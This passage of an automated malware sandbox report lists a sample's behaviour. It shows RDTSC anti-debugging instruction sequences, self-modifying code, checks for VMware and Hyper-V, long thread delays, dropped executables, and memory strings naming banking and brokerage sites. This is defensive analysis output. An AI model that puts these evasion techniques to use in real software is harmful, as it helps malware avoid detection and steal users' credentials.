                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 537348 second address: 5373C7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007F4C288D0386h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F4C288D0388h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D2319h], ebx 0x0000002f push 00000000h 0x00000031 mov bx, di 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007F4C288D0388h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 pushad 0x00000051 adc di, 4582h 0x00000056 mov esi, 6185CEFBh 0x0000005b popad 0x0000005c or edi, dword ptr [ebp+122D1830h] 0x00000062 xchg eax, esi 0x00000063 jp 00007F4C288D038Eh 0x00000069 push ebx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5373C7 second address: 5373D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F4C28D8B356h 0x0000000f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53B316 second address: 53B31A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53F71D second address: 53F763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jnc 00007F4C28D8B356h 0x0000000c pop esi 0x0000000d popad 0x0000000e pushad 0x0000000f jo 00007F4C28D8B35Eh 0x00000015 jnp 00007F4C28D8B356h 0x0000001b push edi 0x0000001c pop edi 0x0000001d pushad 0x0000001e jmp 00007F4C28D8B35Dh 0x00000023 push eax 0x00000024 pop eax 0x00000025 push esi 0x00000026 pop esi 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F4C28D8B364h 0x0000002f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5335AD second address: 5335CA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4C28D8B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e je 00007F4C28D8B356h 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F4C28D8B356h 0x0000001d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 538420 second address: 53844F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F4C28D8B35Dh 0x00000010 jmp 00007F4C28D8B366h 0x00000015 popad 0x00000016 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53C4AE second address: 53C4DB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4C28D8B35Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4C28D8B369h 0x00000013 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020214 second address: 502025A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B35Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4C28D8B369h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4C28D8B368h 0x00000019 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 502025A second address: 502025E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 502025E second address: 5020264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020264 second address: 5020275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C288D038Dh 0x00000009 rdtsc
                      Tries to evade debugger and weak emulator (self modifying code)
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSpecial instruction interceptor: First address: 372826 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSpecial instruction interceptor: First address: 372899 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSpecial instruction interceptor: First address: 5A496A instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 4A2826 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 4A2899 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 6D496A instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSpecial instruction interceptor: First address: E85EC7 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSpecial instruction interceptor: First address: 102F5C7 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSpecial instruction interceptor: First address: 10579EF instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSpecial instruction interceptor: First address: 1042E1C instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSpecial instruction interceptor: First address: 10BAC5C instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeSpecial instruction interceptor: First address: 12A6948 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeSpecial instruction interceptor: First address: 132EFCA instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeSpecial instruction interceptor: First address: EBE98C instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeSpecial instruction interceptor: First address: EE3FAC instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeSpecial instruction interceptor: First address: F556C3 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeSpecial instruction interceptor: First address: D223F9 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeMemory allocated: 4BB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeMemory allocated: 4D40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeMemory allocated: 6D40000 memory reserve | memory write watch
                      Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeCode function: 17_2_05090562 rdtsc 17_2_05090562
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 28_2_04E20000 sldt word ptr [eax]28_2_04E20000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3658Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3402Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2729Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1337Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4487Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7825Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1907Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6971
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2091
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeWindow / User API: threadDelayed 449
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D51OAO8D0TVNMCQXHC.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10128600101\60eb3ded99.exeJump to dropped file
                      Source: C:\Windows\System32\spoolsv.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_31-16821
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_29-22772
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeAPI coverage: 3.4 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7124Thread sleep count: 3658 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7124Thread sleep count: 3402 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6360Thread sleep count: 2729 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312Thread sleep count: 1337 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6436Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6396Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep count: 4487 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6668Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4524Thread sleep count: 290 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5420Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6972Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7060Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6244Thread sleep time: -58029s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6256Thread sleep count: 33 > 30
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6256Thread sleep time: -66033s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 4716Thread sleep count: 276 > 30
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 4716Thread sleep time: -8280000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6044Thread sleep count: 31 > 30
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6044Thread sleep time: -62031s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5400Thread sleep time: -38019s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 4120Thread sleep count: 32 > 30
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 4120Thread sleep time: -64032s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 4716Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe TID: 5720Thread sleep count: 48 > 30
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe TID: 6908Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe TID: 6392Thread sleep time: -38019s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe TID: 4124Thread sleep time: -180000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe TID: 4124Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\spoolsv.exe TID: 1556Thread sleep count: 93 > 30
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe TID: 1576Thread sleep time: -60000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe TID: 5056Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA9BF4 FindFirstFileExW,29_2_00007FF7C9CA9BF4
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0096DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,34_2_0096DBBE
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0093C2A2 FindFirstFileExW,34_2_0093C2A2
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_009768EE FindFirstFileW,FindClose,34_2_009768EE
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0097698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,34_2_0097698F
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0096D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,34_2_0096D076
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0096D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,34_2_0096D3A9
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00979642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,34_2_00979642
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0097979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,34_2_0097979D
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00979B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,34_2_00979B2B
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00975C97 FindFirstFileW,FindNextFileW,FindClose,34_2_00975C97
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_009042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,34_2_009042DE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeThread delayed: delay time: 922337203685477
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005906000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                      Source: 19be97887a.exe, 00000023.00000002.2114874783.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(`
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                      Source: mshta.exe, 0000000E.00000003.922518550.000001A7DE50E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`
                      Source: svchost.exe, 0000001A.00000002.2116855687.00000251C1C4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                      Source: powershell.exe, 0000000C.00000002.981367721.0000025659E58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:n
                      Source: svchost.exe, 0000001A.00000002.2116237958.00000251C1C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: svchost.exe, 00000015.00000002.2128901422.000002CF0FA54000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000001C.00000002.2120033160.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000001C.00000002.2120033160.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1832789599.0000000000D09000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.2000452284.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1861451133.0000000000D09000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000002.2114874783.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1868750086.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1983640551.000001F914970000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: firefox.exe, 00000034.00000002.1988159515.000001F91E5B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
                      Source: svchost.exe, 0000001A.00000002.2117970284.00000251C1D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000015.00000002.2121204148.000002CF0A413000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHp
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                      Source: svchost.exe, 0000001A.00000002.2116855687.00000251C1C4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                      Source: spoolsv.exe, 0000001F.00000002.2110936562.0000000000868000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 0000001F.00000003.2028261198.000000000087C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                      Source: bb5ad48269.exe, 00000036.00000002.1992251677.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: 19be97887a.exe, 0000001E.00000003.1756305299.0000000005900000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
